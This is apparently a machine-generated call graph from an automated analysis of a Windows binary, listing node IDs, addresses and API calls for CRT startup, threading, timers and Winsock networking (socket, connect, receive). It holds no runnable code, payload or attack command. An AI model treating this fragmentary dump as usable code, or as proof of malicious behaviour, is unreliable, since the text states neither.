RtlAllocateHeap 60333->60336 60343 b1202f 60333->60343 60335 b12023 60350 b14acb 59 API calls __getptd_noexit 60335->60350 60336->60333 60336->60335 60340 b12021 60336->60340 60341 b11fd3 60336->60341 60349 b16e73 RtlDecodePointer 60336->60349 60351 b14acb 59 API calls __getptd_noexit 60340->60351 60341->60336 60346 b17291 59 API calls __NMSG_WRITE 60341->60346 60347 b172ee 59 API calls 7 library calls 60341->60347 60348 b16eda GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 60341->60348 60343->60322 60344->60322 60345->60326 60346->60341 60347->60341 60349->60336 60350->60340 60351->60343 60352->60330 60353->60343 60551 b12988 60552 b12991 60551->60552 60553 b12996 60551->60553 60565 b1918c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 60552->60565 60557 b129ab 60553->60557 60556 b129a4 60558 b129b7 _doexit 60557->60558 60560 b12a62 _doexit 60558->60560 60563 b12a05 ___DllMainCRTStartup 60558->60563 60566 b12816 60558->60566 60560->60556 60561 b12a3f 60561->60560 60562 b12816 __CRT_INIT@12 138 API calls 60561->60562 60562->60560 60563->60560 60563->60561 60564 b12816 __CRT_INIT@12 138 API calls 60563->60564 60564->60561 60565->60553 60567 b12822 _doexit 60566->60567 60568 b128a4 60567->60568 60569 b1282a 60567->60569 60571 b128a8 60568->60571 60572 b1290d 60568->60572 60614 b16e56 GetProcessHeap 60569->60614 60576 b128c9 60571->60576 60606 b12833 _doexit __CRT_INIT@12 60571->60606 60703 b17019 59 API calls _doexit 60571->60703 60574 b12970 60572->60574 60575 b12912 60572->60575 60573 b1282f 60573->60606 60615 b14a04 60573->60615 60574->60606 60734 b14894 59 API calls 2 library calls 60574->60734 60708 b17d8b 60575->60708 60704 b16ef0 61 API calls _free 60576->60704 60581 b1291d 60581->60606 60711 b1762a 60581->60711 60583 b1283f __RTC_Initialize 60591 b1284f GetCommandLineA 60583->60591 60583->60606 60584 b128ce 60586 b128df __CRT_INIT@12 60584->60586 60705 b18e2a 60 API calls _free 60584->60705 60707 b128f8 62 API calls __mtterm 60586->60707 60590 b128da 60706 b14a7a 62 API calls 2 library calls 60590->60706 60636 b19228 GetEnvironmentStringsW 60591->60636 60595 b12946 60597 b12964 60595->60597 60598 b1294c 60595->60598 60728 b11f84 60597->60728 60718 b14951 60598->60718 60602 b12869 60610 b1286d 60602->60610 60668 b18e7c 60602->60668 60603 b12954 GetCurrentThreadId 60603->60606 60606->60563 60701 b14a7a 62 API calls 2 library calls 60610->60701 60613 b1288d 60613->60606 60702 b18e2a 60 API calls _free 60613->60702 60614->60573 60735 b170c0 36 API calls 2 library calls 60615->60735 60617 b14a09 60736 b175dc InitializeCriticalSectionAndSpinCount __mtinitlocknum 60617->60736 60619 b14a0e 60620 b14a12 60619->60620 60738 b17d4e TlsAlloc 60619->60738 60737 b14a7a 62 API calls 2 library calls 60620->60737 60623 b14a17 60623->60583 60624 b14a24 60624->60620 60625 b14a2f 60624->60625 60626 b1762a __calloc_crt 59 API calls 60625->60626 60627 b14a3c 60626->60627 60628 b14a71 60627->60628 60739 b17daa TlsSetValue 60627->60739 60740 b14a7a 62 API calls 2 library calls 60628->60740 60631 b14a50 60631->60628 60633 b14a56 60631->60633 60632 b14a76 60632->60583 60634 b14951 __initptd 59 API calls 60633->60634 60635 b14a5e GetCurrentThreadId 60634->60635 60635->60583 60637 b1285f 60636->60637 60638 b1923b WideCharToMultiByte 60636->60638 60649 b18b76 60637->60649 60640 b192a5 FreeEnvironmentStringsW 60638->60640 60641 b1926e 60638->60641 60640->60637 60741 b17672 59 API calls 2 library calls 60641->60741 60643 b19274 60643->60640 60644 b1927b WideCharToMultiByte 60643->60644 60645 b19291 60644->60645 60646 b1929a FreeEnvironmentStringsW 60644->60646 60647 b11f84 _free 59 API calls 60645->60647 60646->60637 60648 b19297 60647->60648 60648->60646 60650 b18b82 _doexit 60649->60650 60742 b174ab 60650->60742 60652 b18b89 60653 b1762a __calloc_crt 59 API calls 60652->60653 60655 b18b9a 60653->60655 60654 b18c05 GetStartupInfoW 60662 b18c1a 60654->60662 60665 b18d49 60654->60665 60655->60654 60656 b18ba5 _doexit @_EH4_CallFilterFunc@8 60655->60656 60656->60602 60657 b18e11 60751 b18e21 RtlLeaveCriticalSection _doexit 60657->60751 60659 b1762a __calloc_crt 59 API calls 60659->60662 60660 b18d96 GetStdHandle 60660->60665 60661 b18da9 GetFileType 60661->60665 60662->60659 60663 b18c68 60662->60663 60662->60665 60664 b18c9c GetFileType 60663->60664 60663->60665 60749 b17dcc InitializeCriticalSectionAndSpinCount 60663->60749 60664->60663 60665->60657 60665->60660 60665->60661 60750 b17dcc InitializeCriticalSectionAndSpinCount 60665->60750 60669 b18e8a 60668->60669 60670 b18e8f GetModuleFileNameA 60668->60670 60760 b13efa 71 API calls __setmbcp 60669->60760 60672 b18ebc 60670->60672 60754 b18f2f 60672->60754 60674 b12879 60674->60613 60679 b190ab 60674->60679 60677 b18ef5 60677->60674 60678 b18f2f _parse_cmdline 59 API calls 60677->60678 60678->60674 60680 b190b4 60679->60680 60684 b190b9 _strlen 60679->60684 60764 b13efa 71 API calls __setmbcp 60680->60764 60682 b12882 60682->60613 60695 b17028 60682->60695 60683 b1762a __calloc_crt 59 API calls 60691 b190ef _strlen 60683->60691 60684->60682 60684->60683 60685 b19141 60686 b11f84 _free 59 API calls 60685->60686 60686->60682 60687 b1762a __calloc_crt 59 API calls 60687->60691 60688 b19168 60689 b11f84 _free 59 API calls 60688->60689 60689->60682 60691->60682 60691->60685 60691->60687 60691->60688 60692 b1917f 60691->60692 60765 b1592c 59 API calls __cftof2_l 60691->60765 60766 b13b75 8 API calls 2 library calls 60692->60766 60694 b1918b 60696 b17034 __IsNonwritableInCurrentImage 60695->60696 60767 b1ab8f 60696->60767 60698 b17052 __initterm_e 60700 b17071 _doexit __IsNonwritableInCurrentImage 60698->60700 60770 b123b4 60698->60770 60700->60613 60701->60606 60702->60610 60703->60576 60704->60584 60705->60590 60706->60586 60707->60606 60709 b17da2 TlsGetValue 60708->60709 60710 b17d9e 60708->60710 60709->60581 60710->60581 60713 b17631 60711->60713 60714 b1292e 60713->60714 60716 b1764f 60713->60716 60805 b1e9b8 60713->60805 60714->60606 60717 b17daa TlsSetValue 60714->60717 60716->60713 60716->60714 60813 b180c5 Sleep 60716->60813 60717->60595 60719 b1495d _doexit 60718->60719 60720 b174ab __lock 59 API calls 60719->60720 60721 b1499a 60720->60721 60816 b149f2 60721->60816 60724 b174ab __lock 59 API calls 60725 b149bb ___addlocaleref 60724->60725 60819 b149fb 60725->60819 60727 b149e6 _doexit 60727->60603 60729 b11f8d HeapFree 60728->60729 60733 b11fb6 _free 60728->60733 60730 b11fa2 60729->60730 60729->60733 60824 b14acb 59 API calls __getptd_noexit 60730->60824 60732 b11fa8 GetLastError 60732->60733 60733->60606 60734->60606 60735->60617 60736->60619 60737->60623 60738->60624 60739->60631 60740->60632 60741->60643 60743 b174bc 60742->60743 60744 b174cf RtlEnterCriticalSection 60742->60744 60752 b17533 59 API calls 8 library calls 60743->60752 60744->60652 60746 b174c2 60746->60744 60753 b16ffd 59 API calls 3 library calls 60746->60753 60749->60663 60750->60665 60751->60656 60752->60746 60755 b18f51 60754->60755 60759 b18fb5 60755->60759 60762 b1ef96 59 API calls x_ismbbtype_l 60755->60762 60757 b18ed2 60757->60674 60761 b17672 59 API calls 2 library calls 60757->60761 60759->60757 60763 b1ef96 59 API calls x_ismbbtype_l 60759->60763 60760->60670 60761->60677 60762->60755 60763->60759 60764->60684 60765->60691 60766->60694 60768 b1ab92 RtlEncodePointer 60767->60768 60768->60768 60769 b1abac 60768->60769 60769->60698 60773 b122b8 60770->60773 60772 b123bf 60772->60700 60774 b122c4 _doexit 60773->60774 60781 b17150 60774->60781 60780 b122eb _doexit 60780->60772 60782 b174ab __lock 59 API calls 60781->60782 60783 b122cd 60782->60783 60784 b122fc RtlDecodePointer RtlDecodePointer 60783->60784 60785 b122d9 60784->60785 60786 b12329 60784->60786 60795 b122f6 60785->60795 60786->60785 60798 b17d1d 60 API calls __cftof2_l 60786->60798 60788 b1238c RtlEncodePointer RtlEncodePointer 60788->60785 60789 b12360 60789->60785 60793 b1237a RtlEncodePointer 60789->60793 60800 b176b9 62 API calls 2 library calls 60789->60800 60790 b1233b 60790->60788 60790->60789 60799 b176b9 62 API calls 2 library calls 60790->60799 60793->60788 60794 b12374 60794->60785 60794->60793 60801 b17159 60795->60801 60798->60790 60799->60789 60800->60794 60804 b17615 RtlLeaveCriticalSection 60801->60804 60803 b122fb 60803->60780 60804->60803 60806 b1e9c3 60805->60806 60811 b1e9de 60805->60811 60807 b1e9cf 60806->60807 60806->60811 60814 b14acb 59 API calls __getptd_noexit 60807->60814 60808 b1e9ee RtlAllocateHeap 60808->60811 60812 b1e9d4 60808->60812 60811->60808 60811->60812 60815 b16e73 RtlDecodePointer 60811->60815 60812->60713 60813->60716 60814->60812 60815->60811 60822 b17615 RtlLeaveCriticalSection 60816->60822 60818 b149b4 60818->60724 60823 b17615 RtlLeaveCriticalSection 60819->60823 60821 b14a02 60821->60727 60822->60818 60823->60821 60824->60732 60825 b0640b 60826 b0644a __cftof2_l 60825->60826 60829 b0649e RtlEnterCriticalSection RtlLeaveCriticalSection 60826->60829 60857 b060f0 60826->60857 60827 b0610a RtlEnterCriticalSection RtlLeaveCriticalSection 60827->60857 60828 b06104 Sleep 60828->60827 60913 b1134c 60829->60913 60831 b064c5 60832 b06509 60831->60832 60834 b1134c 66 API calls 60831->60834 60833 b1134c 66 API calls 60832->60833 60832->60857 60835 b06527 60833->60835 60836 b064d6 60834->60836 60837 b067d2 60835->60837 60839 b06539 60835->60839 60836->60832 60840 b1134c 66 API calls 60836->60840 60838 b1134c 66 API calls 60837->60838 60842 b067dd 60838->60842 60843 b11fbc _malloc 59 API calls 60839->60843 60841 b064e7 60840->60841 60841->60832 60847 b1134c 66 API calls 60841->60847 60844 b06826 60842->60844 60848 b067e7 __cftof2_l 60842->60848 60845 b06540 RtlEnterCriticalSection RtlLeaveCriticalSection 60843->60845 60846 b1134c 66 API calls 60844->60846 60866 b06578 __cftof2_l 60845->60866 60849 b06831 60846->60849 60850 b064f8 60847->60850 60853 b067f7 RtlEnterCriticalSection RtlLeaveCriticalSection 60848->60853 60851 b06837 60849->60851 60852 b0684a 60849->60852 60850->60832 60855 b1134c 66 API calls 60850->60855 60966 b05c11 60851->60966 60856 b1134c 66 API calls 60852->60856 60853->60857 60855->60832 60858 b06855 60856->60858 60857->60827 60857->60828 60858->60857 60976 b11428 79 API calls 2 library calls 60858->60976 60860 b068a0 60977 b01ba7 60860->60977 60862 b06924 60863 b0695c RtlEnterCriticalSection 60862->60863 60864 b06989 RtlLeaveCriticalSection 60863->60864 60865 b0697f 60863->60865 60986 b03c67 60864->60986 60865->60864 60869 b1134c 66 API calls 60866->60869 60872 b065f8 60866->60872 60867 b11fbc _malloc 59 API calls 60874 b0662f __cftof2_l 60867->60874 60869->60872 60872->60867 60877 b06694 60874->60877 60970 b125f6 65 API calls 8 library calls 60874->60970 60881 b11f84 _free 59 API calls 60877->60881 60878 b06b58 61014 b08007 88 API calls __EH_prolog 60878->61014 60883 b0669a 60881->60883 60883->60857 60886 b127c5 _Allocate 60 API calls 60883->60886 60884 b06b20 61012 b073ee 71 API calls Mailbox 60884->61012 60890 b066aa 60886->60890 60888 b06b38 61013 b033b2 86 API calls 60888->61013 60894 b066c5 60890->60894 60973 b0873b 212 API calls __EH_prolog 60890->60973 60891 b06660 60891->60877 60971 b11860 59 API calls _vscan_fn 60891->60971 60972 b125f6 65 API calls 8 library calls 60891->60972 60893 b09729 73 API calls 60899 b06a8b 60893->60899 60923 b09853 60894->60923 60898 b066db 60927 b05119 60898->60927 60899->60884 60900 b09729 73 API calls 60899->60900 60902 b06adc 60900->60902 60902->60884 61011 b0c11b 73 API calls Mailbox 60902->61011 60904 b06717 60956 b09c13 60904->60956 60907 b06774 Sleep 60974 b10900 GetProcessHeap HeapFree 60907->60974 60908 b0676f shared_ptr 60908->60907 60910 b06790 60911 b067aa shared_ptr 60910->60911 60975 b04100 GetProcessHeap HeapFree 60910->60975 60911->60857 60914 b1137b 60913->60914 60915 b11358 60913->60915 61017 b11393 66 API calls 4 library calls 60914->61017 60915->60914 60917 b1135e 60915->60917 61015 b14acb 59 API calls __getptd_noexit 60917->61015 60918 b1138e 60918->60831 60920 b11363 61016 b13b65 9 API calls __cftof2_l 60920->61016 60922 b1136e 60922->60831 60924 b0985d __EH_prolog 60923->60924 61018 b0d004 60924->61018 60926 b0987b shared_ptr 60926->60898 60928 b05123 __EH_prolog 60927->60928 61022 b0fb20 60928->61022 60931 b03c67 72 API calls 60932 b0514a 60931->60932 60933 b03d7e 64 API calls 60932->60933 60934 b05158 60933->60934 60935 b0733f 89 API calls 60934->60935 60936 b0516c 60935->60936 60937 b05322 shared_ptr 60936->60937 60938 b09729 73 API calls 60936->60938 60937->60904 60939 b0519d 60938->60939 60939->60937 60940 b051c4 60939->60940 60941 b051f6 60939->60941 60942 b09729 73 API calls 60940->60942 60943 b09729 73 API calls 60941->60943 60944 b051d4 60942->60944 60945 b05207 60943->60945 60944->60937 60948 b09729 73 API calls 60944->60948 60945->60937 60946 b09729 73 API calls 60945->60946 60947 b0524a 60946->60947 60947->60937 60950 b09729 73 API calls 60947->60950 60949 b052b4 60948->60949 60949->60937 60951 b09729 73 API calls 60949->60951 60950->60944 60952 b052da 60951->60952 60952->60937 60953 b09729 73 API calls 60952->60953 60954 b05304 60953->60954 61026 b0bedd 60954->61026 60957 b09c1d __EH_prolog 60956->60957 61050 b0c0f2 72 API calls 60957->61050 60959 b09c3e shared_ptr 61051 b11100 60959->61051 60961 b09c55 60962 b0675c 60961->60962 61057 b03fb0 68 API calls Mailbox 60961->61057 60962->60907 60962->60908 60964 b09c61 61058 b0968f 60 API calls 4 library calls 60964->61058 60967 b05c17 60966->60967 60968 b11fbc _malloc 59 API calls 60967->60968 60969 b05c96 60967->60969 60968->60967 60970->60891 60971->60891 60972->60891 60973->60894 60974->60910 60975->60911 60976->60860 61293 b22a10 60977->61293 60979 b01bb1 RtlEnterCriticalSection 60980 b01be9 RtlLeaveCriticalSection 60979->60980 60982 b01bd1 60979->60982 61294 b0d334 60980->61294 60982->60980 60983 b01c55 RtlLeaveCriticalSection 60982->60983 60983->60862 60984 b01c22 60984->60983 60987 b0fb20 Mailbox 68 API calls 60986->60987 60988 b03c7e 60987->60988 61357 b03ca2 60988->61357 60993 b03d7e 60994 b03d99 htons 60993->60994 60995 b03dcb htons 60993->60995 61386 b03bd3 60 API calls 2 library calls 60994->61386 61387 b03c16 60 API calls 2 library calls 60995->61387 60998 b03ded 61000 b0733f 60998->61000 60999 b03db7 htonl htonl 60999->60998 61001 b07378 61000->61001 61002 b07357 61000->61002 61005 b069e9 61001->61005 61391 b02ac7 61001->61391 61388 b08601 61002->61388 61005->60878 61006 b09729 61005->61006 61007 b0fb20 Mailbox 68 API calls 61006->61007 61009 b09743 61007->61009 61008 b06a2f 61008->60884 61008->60893 61009->61008 61444 b02db5 61009->61444 61011->60884 61012->60888 61013->60878 61014->60857 61015->60920 61016->60922 61017->60918 61019 b0d00e __EH_prolog 61018->61019 61020 b127c5 _Allocate 60 API calls 61019->61020 61021 b0d025 61020->61021 61021->60926 61023 b0513d 61022->61023 61024 b0fb49 61022->61024 61023->60931 61025 b123b4 __cinit 68 API calls 61024->61025 61025->61023 61027 b0fb20 Mailbox 68 API calls 61026->61027 61028 b0bef7 61027->61028 61029 b0c006 61028->61029 61031 b02b95 61028->61031 61029->60937 61032 b02bb1 61031->61032 61033 b02bc7 61031->61033 61034 b0fb20 Mailbox 68 API calls 61032->61034 61035 b02bdf 61033->61035 61037 b02bd2 61033->61037 61036 b02bb6 61034->61036 61035->61036 61038 b02be2 WSASetLastError WSARecv 61035->61038 61041 b0fb20 68 API calls Mailbox 61035->61041 61042 b02d22 61035->61042 61044 b02cbc WSASetLastError select 61035->61044 61036->61028 61040 b0fb20 Mailbox 68 API calls 61037->61040 61046 b0950d 61038->61046 61040->61036 61041->61035 61049 b01996 68 API calls __cinit 61042->61049 61045 b0950d 69 API calls 61044->61045 61045->61035 61047 b0fb20 Mailbox 68 API calls 61046->61047 61048 b09519 WSAGetLastError 61047->61048 61048->61035 61049->61036 61050->60959 61059 b123c9 61051->61059 61054 b11124 61054->60961 61055 b1114d ResumeThread 61055->60961 61056 b11146 CloseHandle 61056->61055 61057->60964 61060 b123d7 61059->61060 61061 b123eb 61059->61061 61083 b14acb 59 API calls __getptd_noexit 61060->61083 61063 b1762a __calloc_crt 59 API calls 61061->61063 61064 b123f8 61063->61064 61066 b12449 61064->61066 61078 b148ca 61064->61078 61065 b123dc 61084 b13b65 9 API calls __cftof2_l 61065->61084 61069 b11f84 _free 59 API calls 61066->61069 61071 b1244f 61069->61071 61073 b1111b 61071->61073 61085 b14aaa 59 API calls 3 library calls 61071->61085 61072 b14951 __initptd 59 API calls 61074 b1240e CreateThread 61072->61074 61073->61054 61073->61055 61073->61056 61074->61073 61077 b12441 GetLastError 61074->61077 61102 b12529 61074->61102 61077->61066 61086 b148e2 GetLastError 61078->61086 61080 b148d0 61081 b12405 61080->61081 61100 b16ffd 59 API calls 3 library calls 61080->61100 61081->61072 61083->61065 61084->61073 61085->61073 61087 b17d8b __getptd_noexit TlsGetValue 61086->61087 61088 b148f7 61087->61088 61089 b14945 SetLastError 61088->61089 61090 b1762a __calloc_crt 56 API calls 61088->61090 61089->61080 61091 b1490a 61090->61091 61091->61089 61101 b17daa TlsSetValue 61091->61101 61093 b1491e 61094 b14924 61093->61094 61095 b1493c 61093->61095 61096 b14951 __initptd 56 API calls 61094->61096 61097 b11f84 _free 56 API calls 61095->61097 61098 b1492c GetCurrentThreadId 61096->61098 61099 b14942 61097->61099 61098->61089 61099->61089 61101->61093 61103 b12532 __threadstartex@4 61102->61103 61104 b17d8b __getptd_noexit TlsGetValue 61103->61104 61105 b12538 61104->61105 61106 b1256b 61105->61106 61107 b1253f __threadstartex@4 61105->61107 61135 b1475f 59 API calls 6 library calls 61106->61135 61134 b17daa TlsSetValue 61107->61134 61110 b1254e 61111 b12561 GetCurrentThreadId 61110->61111 61112 b12554 GetLastError RtlExitUserThread 61110->61112 61113 b12586 ___crtIsPackagedApp 61111->61113 61112->61111 61117 b1259a 61113->61117 61118 b124d1 61113->61118 61124 b12462 61117->61124 61119 b12513 RtlDecodePointer 61118->61119 61120 b124da LoadLibraryExW GetProcAddress 61118->61120 61123 b12523 61119->61123 61121 b124fd RtlEncodePointer 61120->61121 61122 b124fc 61120->61122 61121->61119 61122->61117 61123->61117 61125 b1246e _doexit 61124->61125 61126 b148ca _LocaleUpdate::_LocaleUpdate 59 API calls 61125->61126 61127 b12473 61126->61127 61136 b11170 61127->61136 61130 b12483 61131 b17954 __XcptFilter 59 API calls 61130->61131 61132 b12494 61131->61132 61134->61110 61135->61113 61154 b10620 61136->61154 61139 b111c0 61176 b0cdb8 61139->61176 61140 b111b8 TlsSetValue 61140->61139 61145 b124a3 61146 b148e2 __getptd_noexit 59 API calls 61145->61146 61147 b124ac 61146->61147 61148 b124c7 RtlExitUserThread 61147->61148 61149 b124c0 61147->61149 61150 b124bb 61147->61150 61292 b14894 59 API calls 2 library calls 61149->61292 61291 b125a6 LoadLibraryExW GetProcAddress RtlEncodePointer RtlDecodePointer 61150->61291 61153 b124c6 61153->61148 61168 b10684 61154->61168 61155 b10716 61192 b131bb 61155->61192 61156 b10700 61156->61155 61158 b10713 CloseHandle 61156->61158 61157 b1069c 61159 b106de ResetEvent 61157->61159 61162 b106b5 OpenEventA 61157->61162 61199 b10c20 GetCurrentProcessId 61157->61199 61158->61155 61164 b106e5 61159->61164 61161 b107ac WaitForSingleObject 61161->61168 61166 b106d7 61162->61166 61167 b106cf 61162->61167 61163 b1072e 61163->61139 61163->61140 61200 b10860 CreateEventA CloseHandle SetEvent GetCurrentProcessId 61164->61200 61166->61159 61166->61164 61167->61166 61170 b106d4 CloseHandle 61167->61170 61168->61156 61168->61157 61168->61161 61171 b10780 CreateEventA 61168->61171 61174 b1079e CloseHandle 61168->61174 61201 b10c20 GetCurrentProcessId 61168->61201 61169 b106b2 61169->61162 61170->61166 61171->61168 61174->61168 61175 b106fd 61175->61156 61177 b0cdda 61176->61177 61203 b04d86 61177->61203 61178 b0cddd 61180 b10f40 61178->61180 61181 b10f79 TlsGetValue 61180->61181 61189 b10f71 Mailbox 61180->61189 61181->61189 61182 b10fed 61183 b11016 61182->61183 61185 b1100e GetProcessHeap HeapFree 61182->61185 61183->61145 61184 b10fc9 61186 b10620 17 API calls 61184->61186 61185->61183 61188 b10fd8 61186->61188 61187 b11059 GetProcessHeap HeapFree 61187->61189 61188->61182 61190 b10fe5 TlsSetValue 61188->61190 61189->61182 61189->61184 61189->61187 61191 b1104b GetProcessHeap HeapFree 61189->61191 61190->61182 61191->61187 61193 b131c3 61192->61193 61194 b131c5 IsProcessorFeaturePresent 61192->61194 61193->61163 61196 b1814f 61194->61196 61202 b180fe 5 API calls 2 library calls 61196->61202 61198 b18232 61198->61163 61199->61169 61200->61175 61201->61168 61202->61198 61204 b04d90 __EH_prolog 61203->61204 61205 b0fb20 Mailbox 68 API calls 61204->61205 61206 b04da6 RtlEnterCriticalSection RtlLeaveCriticalSection 61205->61206 61207 b050d4 shared_ptr 61206->61207 61217 b04dd1 std::bad_exception::bad_exception 61206->61217 61207->61178 61209 b050a1 RtlEnterCriticalSection RtlLeaveCriticalSection 61210 b050b3 RtlEnterCriticalSection RtlLeaveCriticalSection 61209->61210 61210->61207 61210->61217 61211 b09729 73 API calls 61211->61217 61213 b04e8d RtlEnterCriticalSection RtlLeaveCriticalSection 61214 b04e9f RtlEnterCriticalSection RtlLeaveCriticalSection 61213->61214 61214->61217 61215 b0bedd 73 API calls 61215->61217 61217->61209 61217->61210 61217->61211 61217->61213 61217->61214 61217->61215 61223 b04bed 61217->61223 61247 b06d28 60 API calls 61217->61247 61248 b0c00f 60 API calls 2 library calls 61217->61248 61249 b06d02 60 API calls std::bad_exception::bad_exception 61217->61249 61250 b099b6 60 API calls 2 library calls 61217->61250 61251 b09a8e 210 API calls 3 library calls 61217->61251 61252 b10900 GetProcessHeap HeapFree 61217->61252 61253 b04100 GetProcessHeap HeapFree 61217->61253 61224 b04bf7 __EH_prolog 61223->61224 61225 b01ba7 209 API calls 61224->61225 61226 b04c31 61225->61226 61254 b03a94 61226->61254 61228 b04c3c 61229 b03a94 60 API calls 61228->61229 61230 b04c56 61229->61230 61257 b075d6 61230->61257 61235 b0fb20 Mailbox 68 API calls 61236 b04cb8 61235->61236 61282 b0b294 61236->61282 61238 b04ce1 InterlockedExchange 61286 b02995 95 API calls Mailbox 61238->61286 61240 b04d3c 61290 b0761f 75 API calls 2 library calls 61240->61290 61245 b04d57 shared_ptr 61245->61217 61246 b04d06 61246->61240 61287 b07592 76 API calls Mailbox 61246->61287 61288 b072fc 82 API calls Mailbox 61246->61288 61289 b02995 95 API calls Mailbox 61246->61289 61247->61217 61248->61217 61249->61217 61250->61217 61251->61217 61252->61217 61253->61217 61255 b039ee 60 API calls 61254->61255 61256 b03ab5 61255->61256 61256->61228 61258 b0fb20 Mailbox 68 API calls 61257->61258 61259 b075ec 61258->61259 61260 b08a25 77 API calls 61259->61260 61261 b07606 61260->61261 61262 b01712 60 API calls 61261->61262 61263 b04c8b 61262->61263 61264 b0d0fc 61263->61264 61265 b0d106 __EH_prolog 61264->61265 61266 b01a01 61 API calls 61265->61266 61267 b0d11d 61266->61267 61268 b0d15a InterlockedExchangeAdd 61267->61268 61269 b0fb20 Mailbox 68 API calls 61267->61269 61271 b0d195 RtlEnterCriticalSection 61268->61271 61272 b0d18a 61268->61272 61269->61268 61274 b06f5f 60 API calls 61271->61274 61273 b01ec7 InterlockedIncrement PostQueuedCompletionStatus RtlEnterCriticalSection InterlockedExchange RtlLeaveCriticalSection 61272->61273 61276 b0d193 61273->61276 61275 b0d1bb InterlockedIncrement 61274->61275 61277 b0d1d2 RtlLeaveCriticalSection 61275->61277 61278 b0d1cb 61275->61278 61279 b0d856 TlsGetValue 61276->61279 61277->61276 61280 b027f3 SetWaitableTimer 61278->61280 61281 b04ca4 61279->61281 61280->61277 61281->61235 61283 b0b2a7 61282->61283 61284 b0b2d0 61283->61284 61285 b0d9c5 83 API calls 61283->61285 61284->61238 61285->61284 61286->61246 61287->61246 61288->61246 61289->61246 61290->61245 61291->61149 61292->61153 61293->60979 61295 b0d33e __EH_prolog 61294->61295 61296 b127c5 _Allocate 60 API calls 61295->61296 61297 b0d347 61296->61297 61298 b01bfa RtlEnterCriticalSection 61297->61298 61300 b0d555 61297->61300 61298->60984 61301 b0d55f __EH_prolog 61300->61301 61304 b026db RtlEnterCriticalSection 61301->61304 61303 b0d5b5 61303->61298 61305 b02728 CreateWaitableTimerA 61304->61305 61306 b0277e 61304->61306 61308 b02738 GetLastError 61305->61308 61309 b0275b SetWaitableTimer 61305->61309 61307 b027d5 RtlLeaveCriticalSection 61306->61307 61310 b127c5 _Allocate 60 API calls 61306->61310 61307->61303 61311 b0fb20 Mailbox 68 API calls 61308->61311 61309->61306 61312 b0278a 61310->61312 61313 b02745 61311->61313 61315 b127c5 _Allocate 60 API calls 61312->61315 61319 b027c8 61312->61319 61348 b01712 61313->61348 61316 b027a9 61315->61316 61320 b01cf8 CreateEventA 61316->61320 61354 b06e07 CloseHandle 61319->61354 61321 b01d52 CreateEventA 61320->61321 61322 b01d23 GetLastError 61320->61322 61323 b01d96 61321->61323 61324 b01d6b GetLastError 61321->61324 61326 b01d33 61322->61326 61325 b123c9 __beginthreadex 201 API calls 61323->61325 61327 b01d7b 61324->61327 61328 b01db6 61325->61328 61329 b0fb20 Mailbox 68 API calls 61326->61329 61330 b0fb20 Mailbox 68 API calls 61327->61330 61331 b01dc6 GetLastError 61328->61331 61332 b01e0d 61328->61332 61333 b01d3c 61329->61333 61334 b01d84 61330->61334 61340 b01dd8 61331->61340 61335 b01e11 WaitForSingleObject CloseHandle 61332->61335 61336 b01e1d 61332->61336 61337 b01712 60 API calls 61333->61337 61339 b01712 60 API calls 61334->61339 61335->61336 61336->61319 61338 b01d4e 61337->61338 61338->61321 61339->61323 61341 b01ddc CloseHandle 61340->61341 61342 b01ddf 61340->61342 61341->61342 61343 b01de9 CloseHandle 61342->61343 61344 b01dee 61342->61344 61343->61344 61345 b0fb20 Mailbox 68 API calls 61344->61345 61346 b01dfb 61345->61346 61347 b01712 60 API calls 61346->61347 61347->61332 61349 b0171c __EH_prolog 61348->61349 61350 b0173e 61349->61350 61355 b01815 59 API calls std::exception::exception 61349->61355 61350->61309 61352 b01732 61356 b094a6 60 API calls 2 library calls 61352->61356 61354->61307 61355->61352 61368 b030ae WSASetLastError 61357->61368 61359 b03c90 61362 b016ae 61359->61362 61361 b030ae 71 API calls 61361->61359 61363 b016b8 __EH_prolog 61362->61363 61364 b01701 61363->61364 61384 b114e3 59 API calls std::exception::_Copy_str 61363->61384 61364->60993 61366 b016dc 61385 b094a6 60 API calls 2 library calls 61366->61385 61369 b030ec WSAStringToAddressA 61368->61369 61370 b030ce 61368->61370 61372 b0950d 69 API calls 61369->61372 61370->61369 61371 b030d3 61370->61371 61373 b0fb20 Mailbox 68 API calls 61371->61373 61374 b03114 61372->61374 61375 b030d8 61373->61375 61376 b03154 61374->61376 61377 b0311e _memcmp 61374->61377 61375->61359 61375->61361 61379 b0fb20 Mailbox 68 API calls 61376->61379 61383 b03135 61376->61383 61381 b0fb20 Mailbox 68 API calls 61377->61381 61377->61383 61378 b03193 61378->61375 61382 b0fb20 Mailbox 68 API calls 61378->61382 61379->61383 61380 b0fb20 Mailbox 68 API calls 61380->61378 61381->61383 61382->61375 61383->61378 61383->61380 61384->61366 61386->60999 61387->60998 61409 b0353e 61388->61409 61392 b02ae8 WSASetLastError connect 61391->61392 61393 b02ad8 61391->61393 61395 b0950d 69 API calls 61392->61395 61394 b0fb20 Mailbox 68 API calls 61393->61394 61397 b02add 61394->61397 61396 b02b07 61395->61396 61396->61397 61399 b0fb20 Mailbox 68 API calls 61396->61399 61398 b0fb20 Mailbox 68 API calls 61397->61398 61400 b02b1b 61398->61400 61399->61397 61401 b0fb20 Mailbox 68 API calls 61400->61401 61403 b02b38 61400->61403 61401->61403 61405 b02b87 61403->61405 61442 b03027 71 API calls Mailbox 61403->61442 61404 b02b59 61404->61405 61443 b02fb4 71 API calls Mailbox 61404->61443 61405->61005 61407 b02b7a 61407->61405 61408 b0fb20 Mailbox 68 API calls 61407->61408 61408->61405 61410 b03548 __EH_prolog 61409->61410 61411 b03576 61410->61411 61412 b03557 61410->61412 61431 b02edd WSASetLastError WSASocketA 61411->61431 61439 b01996 68 API calls __cinit 61412->61439 61416 b035ad CreateIoCompletionPort 61417 b035c5 GetLastError 61416->61417 61418 b035db 61416->61418 61420 b0fb20 Mailbox 68 API calls 61417->61420 61419 b0fb20 Mailbox 68 API calls 61418->61419 61421 b035d2 61419->61421 61420->61421 61422 b03626 61421->61422 61423 b035ef 61421->61423 61441 b0cef7 60 API calls 2 library calls 61422->61441 61424 b0fb20 Mailbox 68 API calls 61423->61424 61425 b03608 61424->61425 61440 b029ee 76 API calls Mailbox 61425->61440 61428 b0355f 61428->61001 61429 b03659 61430 b0fb20 Mailbox 68 API calls 61429->61430 61430->61428 61432 b0fb20 Mailbox 68 API calls 61431->61432 61433 b02f0a WSAGetLastError 61432->61433 61434 b02f21 61433->61434 61435 b02f41 61433->61435 61436 b02f27 setsockopt 61434->61436 61437 b02f3c 61434->61437 